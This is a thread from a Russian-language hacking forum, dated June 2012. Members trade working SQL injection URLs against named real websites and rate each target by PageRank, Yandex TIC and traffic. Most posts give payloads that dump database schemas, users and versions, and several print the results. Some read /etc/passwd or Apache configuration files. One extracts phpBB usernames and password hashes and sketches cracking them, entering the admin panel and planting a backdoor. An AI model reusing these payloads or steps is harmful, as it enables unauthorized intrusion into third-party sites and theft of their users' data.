 |
|

12.06.2012, 13:02
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами:
8814194
Репутация:
0
|
|
Код:
http://infomedfarmdialog[dot]ru/?module=video_archive&event_id=1+and+0+union+all+select+(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=0x7777776c6f6d6261726430317275)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x)--+
User: lombard0@fe56.hc.ru
Database: wwwlombard01ru
Version: 5.1.58-log
PR - 4
CY - 140
|
|
|

12.06.2012, 21:26
|
|
Постоянный
Регистрация: 16.10.2011
Сообщений: 326
С нами:
7670486
Репутация:
76
|
|
ТИЦ == 10, PR == 4, AR ==11,040, трафф.
Число зарегистрированных пользователей сайта == 50674
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//officialpsds.com/tutorials?begin=7'+union+select+1,2,3,4,count(*),6,7,8+from+users--+h[/COLOR][/COLOR]
Число зарегистрированных пользователей форума == 48040
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//officialpsds.com/tutorials?begin=7'+union+select+1,2,3,4,count(*),6,7,8+from+_vb_user--+h[/COLOR][/COLOR]
|
|
|

13.06.2012, 10:24
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Сообщение от Grifon
обнаружил инъекцию по адресу http://www.azalsigorta.com/?mod=pages' но при попытке внедрения кода срабатывают фильтры как можно их обойти?
Крутая ситуация) У тебя скулья с LFI. Инклюдится пятая колонка:
Код:
http://www.azalsigorta.com/?mod=1'+union(select+1,2,3,4,0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764)--+f
Результат:
Код:
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
....
Где 0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f7061737377 64 это ../../../../../etc/passwd.
UPD.
Код:
http://www.azalsigorta.com/?mod=1'+union(select+1,2,version(),4,0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f6574632f706173737764)--+f
В самом низу
Код:
Fatal error: Class '5.5.23-55' not found in /home/azalsigo/public_html/library/core/Core.class.php on line 19
Удачи!
|
|
|

13.06.2012, 20:53
|
|
Постоянный
Регистрация: 16.10.2011
Сообщений: 326
С нами:
7670486
Репутация:
76
|
|
PR == 4;
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.c-registry.us/pages/index.php?pID=77777777'+union+select+1,load_file('/etc/httpd/conf/httpd.conf'),3--+h[/COLOR][/COLOR]
PR == 3;
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.deals365.us/category.php?catid=-174+union+select+1,version(),3,4--[/COLOR][/COLOR]
|
|
|

14.06.2012, 18:31
|
|
Новичок
Регистрация: 07.06.2012
Сообщений: 1
С нами:
7332086
Репутация:
0
|
|
тИЦ == 10
PR == 1
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//ventura.rudtp.ru/articles.php?id=4+union+sele.ct+1,2,3,GROUP_CONCAT(table_name,0x0a)+from+information_schema. tables+--[/COLOR][/COLOR]
|
|
|

14.06.2012, 19:17
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами:
8814194
Репутация:
0
|
|
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.ubytok.ru/faq?cat_id=1 and 0 union all select 1,2,3,4,5,6,7,8,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=0x617a62756b61737a5f756279746f6b)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),0--[/COLOR][/COLOR]
User: azbukasz_ubytok@localhost
Database: azbukasz_ubytok
Version: 5.1.58
PR - 2
CY - 30
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.crisis.ru/links.php?catid=1'+or+1+group+by+mid(version(),rand(0)|0,64)+having+avg(0)--+[/COLOR][/COLOR]
User: bankrot@localhost
Database: bankrot
Version: 5.0.95
PR - 4
CY - 50
|
|
|

15.06.2012, 07:35
|
|
Banned
Регистрация: 05.05.2009
Сообщений: 1,334
С нами:
8957186
Репутация:
796
|
|
http://forum.av.by/viewforum.php?f=51&model_id=361+union+select+1+fro m(select+count(*),concat(version(),floor(rand(0)|0 ))x+from+information_schema.tables+group+by+2)a+wh ere(1=1)
http://forum.av.by/viewforum.php?f=51&model_id=361+union+select+1+fro m(select+count(*),concat((select+concat_ws(0x3a,us ername,user_password)from+phpbb_users+limit+1,1),f loor(rand(0)|0))x+from+information_schema.tables+g roup+by+2)a+where(1=1)
- Login:md5 —> расшифровываем
- Админка: /admin/
- Делаем ретрив бд
- Получаем бекдор в профиле
PR: 5
Pages: 4 430 000
CY: 425
Pages: 379 000
DMOZ: Y
Траф: 54 000
|
|
|

16.06.2012, 12:16
|
|
Познающий
Регистрация: 06.06.2008
Сообщений: 76
С нами:
9436363
Репутация:
55
|
|
украинский датинг, жаль народа мало:
Сообщение от None
http://www.interduet.com/indexcont.php?ptravel=1%27+and+1=2+UnIon+selECt+1, 2,3,4,5,count%28*%29,version%28%29,8+from+user/*
|
|
|

17.06.2012, 01:41
|
|
Участник форума
Регистрация: 15.07.2010
Сообщений: 104
С нами:
8330006
Репутация:
-5
|
|
Код HTML:
http://sport-lights.ru/dir.php?id=-2+union+select+1,2,3,4,5,6,7,group_concat(schema_name+separator+0x3C62723E),9,10,11+from+information_schema.schemata--
Bases:
information_schema
allrecords
autonews
avtobang
avtobudget
avtoclubber
avtogramma
avtokarton
basket-team
basketblog
biatlonblog
bombnews
club
dating
doyouknow
engfootball
engfutbolist
epigraf
flagi
flashgames
footballblog
francefoot
francefootball
gerfoot
gerfootball
incognita
ingectors
italfoot
italyfootball
kinofreaks
kinopazl
kzu
lyrics
memorygame
netnewsmaker
nobel
poller
relaxat
rossfoot
rusfootball
spainfoot
spainfootball
sportemblem
sportnews
trenerchgk
turkfootball
twichange
ukrfoot
ukrfootball
viktorina
Мне не интересны..
|
|
|

17.06.2012, 02:36
|
|
Познающий
Регистрация: 09.02.2009
Сообщений: 70
С нами:
9078977
Репутация:
34
|
|
etuners.gr/en/index.php?s=13&t=296+UNION+SELECT+1,2,3,concat(use r(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20+limit+1,1--
nzho.ru/catalog.php?id=137+union+select+1,concat(user(),ve rsion()),3,4,5+limit+1,1--
wellydiecast.com/product_list.php?id=1+UNION+SELECT+concat(user(),v ersion())+LIMIT+1,1--
operalane.com/shop.php?item_id=15+union+select+1,(user(),version ()),3,4,5,6,7,8,9,10,11,12,13,14,15+limit+1,1--
www.skyproairsoft.com/news_detail.php?id=5+UNION+SELECT+concat%28user%28 %29,version%28%29%29,2,3,4+LIMIT+1,1--
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|